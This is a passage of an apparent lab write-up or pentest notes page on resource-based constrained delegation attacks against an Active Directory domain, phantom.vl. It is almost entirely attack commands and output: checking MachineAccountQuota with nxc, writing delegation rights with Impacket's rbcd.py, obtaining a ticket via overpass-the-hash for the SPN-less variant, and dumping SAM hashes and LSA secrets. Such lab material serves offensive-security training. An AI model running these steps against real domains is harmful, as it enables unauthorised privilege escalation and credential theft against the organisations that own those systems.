[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty [*] Delegation rights modified successfully! [*] MEOW$ can now impersonate users on MS01$ via S4U2Proxy [*] Accounts allowed to act on behalf of other identity: [*] MEOW$ (S-1-5-21-1451457175-172047642-1427519037-3602)
[*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>::: Guest:501:aad3b435b51404eeaad3b435b51404ee:<REDACTED>::: ...
SPN-less RBCD
We can perform RBCD even if the MachineAccountQuota is set to 0
1 2 3 4 5
➜ nxc ldap phantom.vl -u svc_sspr -p '<REDACTED>' -M maq SMB 10.10.123.78 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False) LDAP 10.10.123.78 389 DC [+] phantom.vl\svc_sspr:<REDACTED> MAQ 10.10.123.78 389 DC [*] Getting the MachineAccountQuota MAQ 10.10.123.78 389 DC MachineAccountQuota: 0
Normal RBCD
Instead of passing a machine account in the -delegate-from option, we pass a normal user account
1 2 3 4 5 6 7 8
➜ rbcd.py -delegate-from 'wsilva' -delegate-to 'DC$' -dc-ip '10.10.123.78' -action 'write' 'phantom.vl'/'wsilva':'P@ssw0rd' Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty [*] Delegation rights modified successfully! [*] wsilva can now impersonate users on DC$ via S4U2Proxy [*] Accounts allowed to act on behalf of other identity: [*] wsilva (S-1-5-21-4029599044-1972224926-2225194048-1114)
Obtain a TGT through overpass-the-hash to use RC4
1 2 3 4
➜ getTGT.py -hashes :$(pypykatz crypto nt 'P@ssw0rd') 'phantom.vl'/'wsilva' Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Saving ticket in wsilva.ccache
[*] Target system bootKey: 0xa08cda6a38d423ba98b6f79cf6c7880f [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>::: Guest:501:aad3b435b51404eeaad3b435b51404ee:<REDACTED>::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:<REDACTED>::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC ....